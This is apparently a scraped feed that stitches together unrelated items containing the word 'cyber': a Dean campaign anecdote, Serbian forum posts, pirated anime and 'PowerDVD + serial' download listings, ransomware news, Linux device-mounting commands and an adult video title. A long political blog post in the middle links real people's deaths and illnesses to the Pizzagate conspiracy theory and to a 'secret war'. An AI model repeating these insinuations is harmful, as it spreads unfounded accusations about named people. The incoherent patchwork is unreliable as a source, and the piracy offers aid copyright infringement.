At the end of tonight's event, Paul Johnson, an independent voter from Nashua who supported John McCain in 2000 and has supported Dean since May, tells Dean that he's "deeply troubled" by the idea that his candidate is going to turn down federal matching funds and bust the caps on campaign spending. Politics is awash in too much money, Johnson says. Why not take the moral high ground and abide by the current system? That sounds like a great idea until Bush spends $200 million, Dean says. Well, then "challenge him to spend less," Johnson replies. Tell him you'll stay under the spending limits if he does, too. Dean's face lights up. "I'll do that at the press conference on Saturday," he says. "That's a great idea." (Saturday at noon is when Dean is scheduled to announce the results of the campaign vote on whether to abandon public financing.)

I walk over to Dean's New Hampshire press secretary, Matthew Gardner, and tell him his candidate just agreed, in an instant, to announce on Saturday that he'll stay under the federal spending caps for publicly financed candidates, if President Bush agrees to do the same (which, admittedly, is more than a little unlikely.) Gardner looks puzzled, then laughs. "That'll be interesting," he says. "We'll see if it happens."

          Iskreno (i neiskreno) sta mislite o osobi iznad   
da zivim u cybersvetu, svoju ceru bi nazvao po njoj!
          Save 20% for Life! thru CyberMonday   
 Join us in Ending Avian Malnutrition   * With the Holidays upon us we’re handing you the opportunity to give your birds a lifetime of good health with this two-part savings plan.   Two different promotions                                         […]
          D-Frag! Subtitle Indonesia   

D-Frag! Subtitle Indonesia

D-Frag! ~ Kazama Kenji percaya bahwa ia adalah semacam ketua geng di sekolahnya, dan orang lain juga tampaknya setuju dengan hal itu. Menjadi ketua geng di sekolah ternyata tidaklah mudah, lawan pertama “Geng Kazama” adalah sekelompok cewek yang terdiri dari 4 orang yang kelihatannya sih normal-normal aja, tapi ternyata dari keempat cewek itulah debut Kenji sebagai ketua geng menjadi berantakan. Siapakah keempat cewek tersebut? Mau apa mereka dengan Kenji? Dan bagaimana nasib kehidupan sehari-hari Kenji?

Type: TV
Episodes: 12
Status: Finished Airing
Aired: Jan 7, 2014 to Mar 25, 2014
Producers: FUNimation EntertainmentL, Media Factory, Brains Base, Kadokawa Shoten
Genres: Comedy, School, Seinen
Duration: 24 min. per episode
Rating: PG-13 - Teens 13 or older
Subtitle : Cybersubs
ReEncoded :

Download D-Frag! Subtitle Indonesia ( MP4 mHD ):

Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

[Direct Link]
Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

Folder D-Frag! mHD  :
Episode 01 - 12 [Kumpul Bagi]


Download D-Frag! Subtitle Indonesia ( MP4 HD ):

Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

[Direct Link]
Episode 01
Episode 02
Episode 03
Episode 04
Episode 05
Episode 06
Episode 07
Episode 08
Episode 09
Episode 10
Episode 11
Episode 12

Folder D-Frag! HD  :
Episode 01 - 12 [Kumpul Bagi]
          FBI Questions U.S. Employees at Russian Cyber Firm Kaspersky Lab   
U.S. officials have long been suspicious the company may have ties to Russian intelligence agencies.
          Quantum Computing: Its Emergence and Implications on Information Security   

Mark Pecen is the Chairman, ETSITC Cyber Working Group for Quantum Safe Cryptography (QSC) (France), Chief Operating Officer, ISARA Corporation, and Board member, Institute for Quantum Computing (Canada). He is currently the CEO of Approach Infinity, Inc. and a member of the Safeguard advisory board. Leading governments around the globe, along with major corporations, including…

The post Quantum Computing: Its Emergence and Implications on Information Security appeared first on Safeguard Scientifics, Inc. - Experience Growth..

          Commentary: Postmarket Management of Cybersecurity in Medical Devices   

Over the last 18 months, an alarming number of medical device companies’ challenges with data security have been exposed. In 2015, Hospira’s LifeCare PCA3 and PCA5 devices were found to have security vulnerabilities that prompted a recall. In 2016, St. Jude’s Merlin@home™ remote cardiac monitoring devices were found to require security updates after research firm…

The post Commentary: Postmarket Management of Cybersecurity in Medical Devices appeared first on Safeguard Scientifics, Inc. - Experience Growth..

          As of right now, we are not seeing a large neo-luddism or cyber-luddism movement in the U.S. Many younger and older people seem to be busy addressing their emotional impulses towards political left or right wing policies and other issues, that they feel take away or limit their personal freedom   
Can the U.S. and world live in a psychological state of cyber nihilism? What will the effects look like? What do you think about this? Read More Here… Is Humanity Headed Into A State Of Cyber Nihilism Read more
          Spy vs Spy: Stuck in the Funhouse   

Funhouses are only fun when you can leave them. When the distorting mirror images become your new, day-to-day reality construct, then it's not so much fun anymore. 

I dreaded the 2016 Election because I had a very strong feeling that no matter who won we'd be plunged into a dystopian paradigm in which major power blocs would erupt into all-out warfare. And I sensed that neither Trump nor Clinton possessed the political skills or the communicative powers to keep the carnage fully out of our view. Or our path.

And I was right.

Trump's only been in office for a little over two months and I'm exhausted already. I'm certainly not alone in this. It all feels like a TV sitcom in its seventh season, well after the writers ran out of story ideas. The shark has been good and jumped. And the ratings (the approval ratings, in this case) are plunging too.

What is truly demoralizing though is the utter transparency of the secret war playing out, the seemingly endless spy vs spy thrust and counter-thrust, and the obvious deceptions. Even more so is the Animal Farm-like metamorphosis of the Democratic Party into a full-blown, funhouse mirror of McCarthy-era Republicans, but with Glenn Beck-worthy conspiracy theories thrown in for good measure.

I don't know about you but all of a sudden the world seems especially cold, hard, gray, harsh. Masks are coming off, velvet gloves tossed into wastebins. It doesn't seem to matter who wins the scorpion fight, you're still stuck with a scorpion.  

We can't call out the play-by-play because it's largely being acted out behind closed doors. But we can look at the collateral damage and make certain speculations. There's no doubt that it would all be just as bad-- probably worse-- if Hillary won. Even so, this all feels especially grating.

You've probably seen this story:
Conspiracy theorist Alex Jones on Friday apologized to the owner of a Washington pizzeria that became the subject of a conspiracy theory about human trafficking last year. 
Pizza shop Comet Ping Pong was thrust into the spotlight last year after a gunman allegedly fired a shot inside the restaurant. The suspect said he was investigating the unsubstantiated conspiracy theory that Hillary Clinton and her campaign chairman, John Podesta, were operating a child sex trafficking ring out of the restaurant. 
The theory, which became known as Pizzagate, had circulated among far-right conspiracy theory websites and social media accounts. 
“In our commentary about what had become known as Pizzagate, I made comments about Mr. Alefantis that in hindsight I regret, and for which I apologize to him,” Jones, who runs Infowars, said in a video. James Alefantis is the owner of Comet Ping Pong. 
Jones said his website relied on reporters who are no longer employed by Infowars and that video reports about Pizzagate were removed from the website. He also invited Alefantis onto the show to discuss the incident.
It was preceded by this story:
According to McClatchy News, the FBI’s Russian-influence probe agents are exploring whether far-right news operations, including the pro-Donald Trump sites Breitbart News and Infowars, “took any actions to assist Russia’s operatives.”  Trump’s ousted national security adviser Michael Flynn and his son, a member of the Trump transition team, were among those who boosted the so-called “PizzaGate” pedophile conspiracy theory.
I doubt this will quell the fervor among the Pizzagaters on sites like 4chan and Voat. Given the suspicion many on the fringes regard Jones with it may in fact give the flagging movement a fresh jolt. Jones' apology may also have to do with the drive to purge YouTube of "extremist" content and the controversy over the use of advertising on videos corporate clients find objectionable. A World without Sin, as our Gordon might put it. 

Washington Post headline, pre-election.

So much for theories that the FBI was ready to make mass arrests of prominent Washington figures related to Pizzagate.  Has any "mass arrest" Internet story ever panned out?  

Maybe it has:
Donald Trump became president on Jan. 20. And in one short month, there were more than 1,500 arrests for sex crimes ranging from trafficking to pedophilia.  
Big deal? You bet. In all of 2014, there were fewer than 400 sex trafficking-related arrests, according to FBI crime statistics. Liz Crokin at has put together a great piece on the push by the Trump administration to crack down on sex crimes. And she notes that while "this should be one of the biggest stories in the national news... the mainstream media has barely, if at all, covered any of these mass pedophile arrests. This begs the question – why?
This may have nothing to do with Trump-- in fact, it's likely it doesn't-- since these kinds of actions are planned out months in advance. The arrests continue, in case you were wondering, with major busts going down on a near-weekly basis. Someone's cleaning house. 

For what it's worth, I always reckoned that Pizzagate was in fact cover/distraction for a more hidden struggle, one that would take place under the radar*. As I noted back in November:

No one is saying as much but this very much feels connected to a deeper, more covert war. 
Why would I say such a thing? Because at the same time the Pizzagate story went dark we've seen major strikes taken against international pedophilia, which actually is a global conspiracy, with its own networks, secret codes and moles within established centers of power such as schools, police departments and governments.  
With such combustible accusations-- and such potential for a scandal that could quickly spread out of control (ie., involve political figures you're not trying to destroy)-- you'd naturally expect the action to go dark and the fall guys to be placed pretty far down the foodchain. (Remember that a prior investigation bagged one of the most powerful people in Washington at one time, former Speaker of the House Dennis Hastert).†


It may be sheer coincidence, but James Alefantis' former partner suffered a major heart attack this week
Media Matters for America founder David Brock was rushed to a hospital on Tuesday after suffering a heart attack. 
According to a press release from MMA, the founder of the liberal media watchdog and analysis website was rushed to the hospital early Tuesday afternoon and received treatment.
Sure, it may be coincidence. But I couldn't help but remember this story, published soon after the election
Dems to David Brock: Stop Helping, You Are Killing Us 
Democrats know they need someone to lead them out of the wilderness. But, they say, that someone is not David Brock.

As David Brock attempts to position himself as a leader in rebuilding ademoralized Democratic Party in the age of Trump, many leading Democratic organizers and operatives are wishing the man would simply disappear.
"Disappear." Huh. 
Many in the party—Clinton loyalists, Obama veterans, and Bernie supporters alike—talk about the man not as a sought-after ally in the fight against Trumpism, but as a nuisance and a hanger-on, overseeing a colossal waste of cash. And former employees say that he has hurt the cause.
It's worth remembering that Andrew Breitbart died of a heart attack at the age of 43. A year before he'd posted a cryptic tweet that some have since linked to the Pizzagate imbroglio.  Just before his death he hyped some revelation about Barack Obama's past. 

A coroner in the office handling Breitbart's body subsequently died of arsenic poisoning. The day Breitbart's autopsy results were revealed, in fact.


We also saw James Comey revive Russiagate, which had been flatlining after Vault 7. Any illusions among Trump fans that the FBI was secretly on their side were ground into powder, between this revelation and the Pizzagate conspiracy investigations. 

One can't help but wonder if the New Praetorians (I've noticed that the Praetorian meme has been picked up by more prominent commentators, but you heard it here first) are losing their last shred of patience with Donald Trump's shenanigans and are planning imminent regime change: 
WASHINGTON (AP) — The FBI is investigating whether Donald Trump’s associates coordinated with Russian officials in an effort to sway the 2016 presidential election, Director James Comey said Monday in an extraordinary public confirmation of a probe the president has refused to acknowledge, dismissed as fake news and blamed on Democrats. 
In a bruising five-hour session, the FBI director also knocked down Trump’s claim that his predecessor had wiretapped his New York skyscraper, an assertion that has distracted White House officials and frustrated fellow Republicans who acknowledge they’ve seen no evidence to support it.
How surreal is the world in which you know live in? So much so that mainstream political site The Hill is comparing the action in Washington to a Stanley Kubrick film, one which has become notorious for the conspiracy theories that have been projected onto it (and is well familiar to Synchronauts):
On the 40th anniversary of the publication of The Shining, Stephen King must be wondering if Washington is working on its own sequel. For the last couple months, Washington has been on edge, like we are all trapped in Overlook Hotel with every day bringing a new “jump scare,” often preceded by a telltale tweet. Indeed, a Twitter whistle has replaced suspenseful music to put the entire city on the edge of their seats. 
In this Shining sequel, however, people are sharply divided on who is the deranged ax-wielding villain in this lodge, the president or the press. Ironically, with the recent disclosure that some of the Trump campaign may indeed have been subject to surveillance, the president is looking more like Danny Torrence, a character dismissed for constantly muttering “redrum, redrum” until someone finally looked in a mirror at the reverse image to see the true message.
Yeah, I'm not really feeling that metaphor there, but whatever. It's been that kind of year.

Now the Internet is burning up with theories that disgraced National Security Adviser Michael Flynn has "turned" and is going to testify against the Trump Administration, or at least figures attached to it. 

It's hard to imagine a three-star general can be stupid enough to be guilty of things Flynn's been accused of but that may speak to a culture of impunity in Washington, in which your misdeeds are only punished if you get on the wrong side of the wrong people.


One wonders if the secret war has spread outside Washington. Car service giant Uber seems to be having a major run of rotten luck lately: 
Uber Technologies Inc. is suspending its self-driving car program after one of its autonomous vehicles was involved in a high-impact crash in Tempe, Arizona, the latest incident for a company reeling from multiple crises. 
In a photo posted on Twitter, one of Uber’s Volvo self-driving SUVs is pictured on its side next to another car with dents and smashed windows. An Uber spokeswoman confirmed the incident, and the veracity of the photo, and added that the ride-hailing company is suspending its autonomous tests in Arizona until it completes its investigation and pausing its Pittsburgh operations.

The incident also comes as Uber, and Chief Executive Officer Travis Kalanick, are currently under scrutiny because of a series of scandals. The ride-hailing company has been accused of operating a sexist workplace. This month, the New York Times reported that Uber used a tool called Greyball to help drivers evade government regulators and enforcement officials. Kalanick said he needed "leadership help" after Bloomberg published a video showing him arguing with an Uber driver.
So who did Kalanick piss off? 

Coincidentally- there's that word again- the crash comes soon after Wikileaks revealed that CIA hackers had the ability to override the computer systems in automobiles. From Mashable:

WikiLeaks has published a trove of files it says are linked to the CIA's hacking operations — which apparently includes efforts to hack into cars.  
The first in a series called "Vault 7," "Year Zero" supposedly comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia.  
"Year Zero" details the CIA's malware arsenal and "zero day" exploits against Apple iPhones, Google's Android operating system, Microsoft Windows and even Samsung TVs.  
 According to a document from 2014, the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. 
Oh, that's reassuring. Speaking of control systems, apparently pimps are controlling prostitutes with RFID chips:
It turns out this 20-something woman was being pimped out by her boyfriend, forced to sell herself for sex and hand him the money. 
 “It was a small glass capsule with a little almost like a circuit board inside of it,” he said. “It's an RFID chip. It's used to tag cats and dogs. And someone had tagged her like an animal, like she was somebody's pet that they owned.” 
This is human trafficking. It’s a marginal issue here in the U.S. for most of us. Part of that is because the average person isn’t sure what human trafficking – or modern day slavery – actually means.
Technology is our friend, right? And now this: 
Turkish Hackers Threaten To Wipe Millions Of iPhones; Demand Ransom From Apple 
Today, courtesy of CIO, we learn that a group of hackers referring to themselves as the "Turkish Crime Family", has been in direct contact with Apple and is demanding a $150,000 ransom by April 7th or they will proceed to wipe as many as 600 million apple devices for which they allegedly have passwords. 
The group said via email that it has had a database of about 519 million iCloud credentials for some time, but did not attempt to sell it until now. The interest for such accounts on the black market has been low due to security measures Apple has put in place in recent years, it said.

Since announcing its plan to wipe devices associated with iCloud accounts, the group claimed that other hackers have stepped forward and shared additional account credentials with them, putting the current number it holds at over 627 million.

According to the hackers, over 220 million of these credentials have been verified to work and provide access to iCloud accounts that don't have security measures like two-factor authentication turned on.
Of course, if credible, with an ask of just $150k, this is the most modest group of hackers we've ever come across.
Given the war that's erupted between the increasingly aggressive Turkish government and the EU, money may clearly not be the object here. Turkish PM Erdogan is clearly set on reconstructing the old Ottoman Empire and shivving Apple might just be part of the march.

Besides, Turkey is taking that recent coup attempt-- which is almost universally blamed on the CIA-- very personally.

Speaking of the EU, we've seen stories that Trump advisor Steve Bannon wants to dissolve the union. Which may be why Trump-adversary John McCain announced his unalloyed support for it- and the "New World Order" (his words, not mine):
The world "cries out for American and European leadership" through the EU and Nato, US senator John McCain said on Friday (24 March). 
In a "new world order under enormous strain" and in "the titanic struggle with forces of radicalism … we can't stand by and lament, we've got to be involved," said McCain, a former Republican presidential candidate who is now chairman of the armed services committee in the US Senate. 
Speaking at the Brussels Forum, a conference organised by the German Marshall Fund, a transatlantic think tank, he said that the EU and the US needed to develop "more cooperation, more connectivity". 
"I trust the EU," he said, defending an opposite view from that of US president Donald Trump, who said in January that the UK "was so smart in getting out" of the EU and that Nato was "obsolete". 
He said that the EU was "one of the most important alliances" for the US and that the EU and Nato were "the best two sums in history", which have maintained peace for the last 70 years. "We need to rely on Nato and have a Nato that adjusts to new challenges," he said.
Would McCain speak this way to a domestic audience? Of course not. Or maybe he would- I can't tell which way is up anymore. But either way it's good to know where he really stands.

Like McCain, China continues to sound a similar note of support for globalization, on which its very economic survival so desperately depends:
Chinese Vice Premier Zhang Gaoli told a gathering of Asian leaders that the world must commit to multilateral free trade under the World Trade Organization and needs to reform global economic governance. 
“The river of globalization and free trade will always move forward with unstoppable momentum to the vast ocean of the global economy,” Zhang said. China will remain a strong force in the world economy and for peace and stability, he said, adding that countries must respect one another’s core interests and refrain from undermining regional stability. 
I suppose this is why China is off the target list for our new Cold (?) Warriors.

I've resisted posting on all this because it's all so depressing. I've actually written a few pieces on this chicanery that I ended up roundfiling. But I suppose I just wanted to go on the record about all this skullduggery, for posterity's sake.

UPDATE: Sex trafficking arrests and trials continue to proliferate. Most recent bust, an international ring in Minnesota. There is way too much activity going down in too short a time for this to be spontaneous.

* Which is exactly why I refrained from commenting on it here for the most part, instead noting that it had become a kind of memetic virus in much the same way that the Franklin/Boy's Town scandal had in the 90s. (Note that prior to the election-- and Pizzagate-- Trump nemesis the Washington Post was all over the issue of sex trafficking in the nation's capital). 

† The ongoing legal and police actions coinciding with the moves to shut down the Pizzagate fringes on the Web seem like the exact kind of action one would expect if there were a serious operation at work. Shutting down the Internet chatter makes perfect sense in this context because it can only complicate cases made by prosecutors. 
          Iskreno (i neiskreno) sta mislite o osobi iznad   
cyber sexy :D
          Iskreno (i neiskreno) sta mislite o osobi iznad   
molim... :D

tjuti, nemo' da te ja...opalim! lol

el si ti ti postala Cyber Bi? roll


a sto se ti javljas, si ti ToJeOna? roll

i nikad vise necu da budem

Sho shock :?: NEje ti dovoljno dobra da bidnes ona? twisted
          Iskreno (i neiskreno) sta mislite o osobi iznad   
molim... :D

tjuti, nemo' da te ja...opalim! lol

el si ti ti postala Cyber Bi? roll


a sto se ti javljas, si ti ToJeOna? roll

i nikad vise necu da budem
          Iskreno (i neiskreno) sta mislite o osobi iznad   
molim... :D

tjuti, nemo' da te ja...opalim! lol

el si ti ti postala Cyber Bi? roll


a sto se ti javljas, si ti ToJeOna? roll
          Iskreno (i neiskreno) sta mislite o osobi iznad   
molim... :D

tjuti, nemo' da te ja...opalim! lol

el si ti ti postala Cyber Bi? roll

          Iskreno (i neiskreno) sta mislite o osobi iznad   
molim... :D

tjuti, nemo' da te ja...opalim! lol

el si ti ti postala Cyber Bi? roll
          Unstoppable Petya Ransomware CyberAttack Hits Networks and Computers in Over 65 Countries   
Yesterday saw the second major ransomware outbreak in a matter of less than two months. Countless big and small organizations including financial and government institutions, media, Russia’s Central Bank, Airports in Kiev, the shipping giant Maersk, and a number of other companies working in a variety of industries had their computer systems locked. Microsoft says […]
          igra istine   
ja samo preferiram cyber odvajam se od racunara...
          Broken Genome Tracks Girl Scouts; Live!!   

Recorded in front of a live audience and benefitting Part Hall and KBCZ 90.1 FM, Boulder Creek, CA, we covered broken internet, vegetarianism permanently reshaping the human genome, Amazon buying Whole Foods, new browser tech, Meditation changing your DNA, court protecting your online social rights, and much more geek news of the week including questions form our live audience.

          Keeping your Zen with Linux   
Creative mp3 players seemed to be a reasonable choice in the early IPod mania days, the single main problem that iv had for years with my trusty Nomad Zen Xtra is the fact that there was no Linux interoperability what so ever, the only (somewhat shaky) solution was to wait for Gnomad to mature.
Things has changed and the Zen access has worked with Gnomad, but two major issues remained:
  • No automation possible (like latest podcast copying with a matching playlist generated).

  • Ugly and limiting UI to deal with.

After a bit digging iv found mtpfs which is a FUSE file system that can mount MTP devices, installation and usage are simple as:

$ sudo aptitude install mtpfs
$ sudo mkdir /media/zen
$ sudo mtpfs -o allow_other /media/zen/ # allowing other enables non root access to zen folders
$ ls /media/zen
Music My Playlists Playlists WMPInfo.xml

The Music folder holds all the mp3 files in a flat structure and the Playlists folder hold m3u files in the following format (the player root is /):


Its quite easy to see how to automate the podcast download and copying combined with podget utility, my Zen has been restored :)
          Xbox One : Cinq jeux Xbox 360 rétrocompatibles en plus   

Microsoft a fait part de la rétrocompatibilité de cinq jeux Xbox 360 supplémentaires sur la Xbox One. Le premier est issu d’une des séries emblématiques de chez Ubisoft car il s’agit d’Assassin’s Creed : Brotherhood considéré par une bonne majorité de fans comme le meilleur opus de cette licence malgré le fait que ce soit plus une extension du deuxième opus qu’une véritable suite. Le deuxième est un peu moins connu car il s’agit de Wolf of the Battlefield : Commando 3. Le troisième va ravir les nostalgiques du shoot’em up ayant connu ce jeu à la base sur Saturn puisqu’il s’agit de Radiant Silvergun. Certes ce jeu va mettre vos réflexes à rude épreuve ce qui ne vous empêchera de vous reposer sur le quatrième jeu du nom de  Blazing Angels : Squadrons of WWII qui n’a pas fait beaucoup parler de lui mais reste sympathique à jouer malgré tout. Et jamais deux sans trois concernant les jeux obscurs car oui, le cinquième et dernier jeu répond sous le nom de Cyber Trooper Virtual-On : Oratorio Tangram.  Nous sommes ravis que Microsoft continue de mettre à jour sa rétrocompatibilité Xbox 360 sur Xbox One et on espère voir arriver au plus vite des jeux Xbox première du nom sur cette console.

Cet article Xbox One : Cinq jeux Xbox 360 rétrocompatibles en plus est apparu en premier sur GamersNine.

          CyberSecurity Engineer - Black Box Network Services - Lawrence, PA   
Configuration and monitoring of detection technologies:. Experience in configuration of Symantec Endpoint Protection and Endpoint Encryption....
From Black Box Network Services - Wed, 07 Jun 2017 20:18:04 GMT - View all Lawrence, PA jobs
          Ghost In The Shell Stand Alone Complex 1st GIG E16-20 BDRip 1080p Ita Jap x265-NAHOM [BDRiP] [Seed (1)/Leech (0)]   

Titolo: Ghost In The Shell Stand Alone Complex 1st GIG
Anno: 2002
Genere: Fantascienza
Produzione: I.G. Production
Distribuzione: Panini Video 2006
Numero episodi: 26
Durata approssimativa episodi: 24'

Ambientato nel XXI secolo Ghost in the Shell è in superficie un thriller di spionaggio futuristico che segue le imprese del maggiore Motoko Kusanagi, membro della Nona Sezione, una squadra speciale di operazioni in incognito della Commissione nazionale di pubblica sicurezza giapponese specializzata nel combattere crimini legati alla tecnologia. Sebbene tecnicamente sia pari grado agli altri membri, Kusanagi ricopre il ruolo di leader della squadra e viene solitatamente chiamata maggiore a causa del suo passato rango nelle forze armate. È in gran parte robotizzata, un cervello umano in un corpo artificiale capace di imprese sovrumane e specializzata per il suo lavoro.

L'ambientazione di Ghost in the Shell è distintivamente cyberpunk o postcyberpunk, simile a quelle della Trilogia dello sprawl dello scrittore di fantascienza William Gibson, sebbene l'opera di Shirow sia maggiormente focalizzata sulle ramificazioni etiche e filosofiche della fusione tra l'umanità e la tecnologia. Gran parte degli uomini sono collegati alla rete, a cui possono accedere non soltanto mediante terminali fisici, ma soprattutto attraverso impianti situati nel loro stesso cervello. Diversi uomini sono diventati cyborg, ovvero esseri in parte organici in parte robotici. Quello che differenzia un cyborg integrale da un robot è la presenza di un cervello umano e del Ghost, ovvero dell'anima, qualcosa di intrinseco e inspiegabile che permette agli uomini di "sentire" sensazioni particolari. Il Ghost è l'istinto non mediato dai calcoli. Lo sviluppo dell'intelligenza artificiale ed un'onnipresente rete computerizzata sono il palcoscenico per la rivoluzione dell'identità umana e della unicità di sé stessi. In particolare il manga affronta direttamente queste problematiche: Kusanagi ed i suoi colleghi devono affrontare minacce esterne così come soffrire conflitti interni dovuti alle loro proprie nature.

[ Info sul file ]

Nome: Ghost In The Shell Stand Alone Complex 1st GIG E16 BDRip 1080p Ita Jap x265-NAHOM.mkv
Data: Wed, 28 Jun 2017 23:26:33 +0200
Dimensione: 224,396,762 bytes (214.001429 MiB)

[ Magic ]

Tipo file: data

[ Info generiche ]

Durata: 00:25:18 (1518.186 s)
Contenitore: matroska
Production date: Wed, 28 Jun 2017 23:26:17 +0200
Totale tracce: 5
Traccia n. 1: video (V_MPEGH/ISO/HEVC) {und}
Traccia n. 2: audio (A_AAC) {jpn}
Traccia n. 3: subtitle (S_TEXT/ASS) {eng}
Traccia n. 4: subtitle (S_TEXT/ASS) {eng}
Traccia n. 5: audio (A_AAC) {ita}
Muxing library: libebml v1.3.4 + libmatroska v1.4.5
Writing application: mkvmerge v13.0.0 ('The Juggler') 32bit

[ Traccia video ]

Risoluzione: 1920 x 1080
Frame aspect ratio: 16:9 = 1.777778
Pixel aspect ratio: 1:1 = 1
Display aspect ratio: 16:9 = 1.777778
Framerate: 24.000001 fps
Dimensione stream: 169,486,725 bytes (161.635137 MiB)
Durata: 00:24:51 (1491.24994 s)
Bitrate (bs): 909.233096 kbps
Qf: 0.01827

[ Traccia audio nr. 1 ]

Codec ID: A_AAC
Freq. campionamento: 24000 Hz
Freq. campionamento output: 48000 Hz
Canali: 6
Dimensione stream: 29,403,307 bytes (28.041179 MiB)
Tipo di bitstream (bs): AAC SBR (Spectral Band Replication)
Frames (bs): 34,457
Durata: 00:24:30 (1470.165333 s)
Chunk-aligned (bs): Sì
Bitrate (bs): 160.000002 kbps VBR
Freq. campionamento (bs): 24000 Hz
Modo (bs): 6: front-center, front-left, front-right, back-left, back-right, LFE-channel

[ Traccia audio nr. 2 ]

Codec ID: A_AAC
Freq. campionamento: 48000 Hz
Canali: 2
Dimensione stream: 24,485,748 bytes (23.351429 MiB)
Tipo di bitstream (bs): AAC Main
Frames (bs): 71,165
Durata: 00:25:18 (1518.186667 s)
Chunk-aligned (bs): Sì
Bitrate (bs): 129.026284 kbps VBR
Freq. campionamento (bs): 48000 Hz
Modo (bs): 2: front-left, front-right

Rapporto creato da AVInaptic (18-12-2011) in data 28-06-2017 23:50:08

          Le ransomware Petya demande une rançon pour libérer les données d'un PC infecté   
C'est une nouvelle menace informatique qui pèse sur les entreprises et les particuliers. Petya est un « ransomware » qui prend les données d'un PC en otage, et ne les libère qu'en payant une rançon en bitcoin.
Le ransomware Petya demande une rançon pour libérer les données d'un PC infecté
Cette rançon se monte à 300 $, à régler avec la fameuse devise cryptée. Cette cyberattaque a d'abord frappé la Russie et l'Ukraine, avant de s'étendre au reste du monde, tout particulièrement en Europe et en Amérique du Nord. Plusieurs grandes entreprises, comme Saint-Gobain en France, le géant pétrolier Rosneft en Russie ou le groupe de publicité anglais WPP Group ont été touchés à plus ou moins grande échelle.

Pour ce qui concerne la France, une enquête a été ouverte tandis que les autorités appellent à la plus grande prudence — et s'il le faut, à isoler du réseau  les PC qui pourraient être infectés. Elles conseillent aussi de ne rien payer car les pirates pourraient ne pas donner la clé qui déverrouillerait les données. C'est une fois encore les ordinateurs sous Windows, et en particulier les plus anciens encore en fonctionnement, qui sont visés. Bien souvent, les utilisateurs de ces PC n'appliquent pas ou plus les mises à jour de sécurité, laissant les machines sans défense face à ce type de menaces.

Il y a quelques semaines, c'est un autre de ces « rançongiciels » qui faisaient parler de lui : WannaCry. Là aussi il fallait payer une rançon pour récupérer les données de son disque dur. Un développeur anglais avait alors pu stopper nette la propagation de ce virus. Petya, qui exploite les mêmes failles que son prédécesseur, semble lui bien plus virulent. 

          New Cyberattack Spreads Fast Across The Globe   
          The Fed’s Balance Sheet Lives in Cyberspace! The Meaning!   
The name of our Central Bank is the Federal Reserve. This private corporation (operationally) has a current balance sheet which totals some $4.5 trillion. Most of this quantity has arisen since 2008. Some $3.7 trillion of new $$$ were created from the consciousness of our Fed policymakers. These $$$ (virtual/digital units) were then spent to […]
          Definitions: Virtual, Digital, Cyber, Electronic, Cashless, Imaginary!   
My sense is that most investors and pundits do not realize that we live with ‘imaginary markets today. What today’s thinkers need to do is read the definitions of key words which reveal the nature of today’s virtual/electronic markets. I still run into many business people who think that our money is a paper note […]
          Ukraine Is Russia's Testbed For Launching Devastating Cyberwar Attacks With Total Impunity   
          Doggystyle For Hot Amateur Cyber Slut   
Watch Doggystyle For Hot Amateur Cyber Slut at - best free online XXXPorn videos for you to enjoy.
          Debian / Ubuntu Linux Install and Configure Remote Filesystem Snapshot with rsnapshot Incremental Backup Utility   
I would like to configure my Debian box to backup two remote servers using rsnapshot software. It should make incremental snapshots of local and remote filesystems for any number of machines on 2nd hard disk located at /disk1 ( /dev/sdb2). How do I install and use rsnapshot on a Ubuntu or Debian Linux server?
          Moscow prepares retaliation for U.S. seizure of Russian diplomatic compounds   

Moscow prepares retaliation for U.S. seizure of Russian diplomatic compoundsMoscow is preparing retaliatory measures to Washington's decision to seize two Russian diplomatic compounds in the United States in 2016, Russia's foreign ministry spokeswoman said on Wednesday. In December, U.S. seized two Russian diplomatic compounds as then President Barack Obama ordered the expulsion of 35 Russians over what he said was their involvement in hacking to interfere in the U.S. presidential election campaign. Moscow, which denies such allegations, did not retaliate immediately, saying it would wait to see if relations improved under President Donald Trump.

          Microsoft Adding Artificial Intelligence Based Advanced Antivirus To Windows 10   

Microsoft is making every effort to make its Windows operating system more secure and advanced than ever before by beefing up its security practices and hardening it against hackers and cyber attacks in its next release With the launch of i...
          CyberLink PowerDVD 11 Ultra + Sérial   

Cyber-Link Power-DVD 11 ultra umas das melhores ferramentas pra reproduzir dvds em seu computador.
Com essa versão 11 esse programa incrível aguenta reproduzir videos  Blu-ray diretor do seu computador.
Experimente essa nova versão. ;D
Serial tudo junto.

Link pra download:

          Gynecologic Oncologist - Lancaster General Health - Pennsylvania   
This 90,000 square foot state-of-the-art center features 31 infusion chairs, 53 exam rooms, the nation's first Cyberknife M6, the da Vinci® Surgical System, and...
From Lancaster General Health - Sun, 18 Jun 2017 05:16:10 GMT - View all Pennsylvania jobs
          European Transmission Network Signs MoU to Develop Cyber Security   
The collaboration results from a series of hacking and security training programs.
          Parents, do you know the signs and indicators of cyberbullying?   
 It’s the bullying that can’t be seen – cyberbullying – and it's becoming even more prevalent.
          Recycled Metal Queen Monster head --- Steampunk Dieselpunk Cyberpunk Craft Handmade by Kreatworks   

160.00 USD

Dimension is approx 20 x 36 x 17 cm ( height x length x width)
Weight is approx 2.5 kg

■ It is made from recycled metal, useless auto parts & machine.
■ Coating by lacquer, protect from "Rust".

Thank you for visiting.
If you have any question, Please feel free to contact us by E-mail or Convos.

■ Before purchase this item, Please contact us first for checking our stock.
■ We will ship by international parcel service : SAL (Thailand post)
Delivery time is 15-30 days.

Actual model may vary from the image shown, specifications may vary and
are subject to change without prior notice.
( Due to it is handmade and depends on recycled metal materials. )

          May 2017   
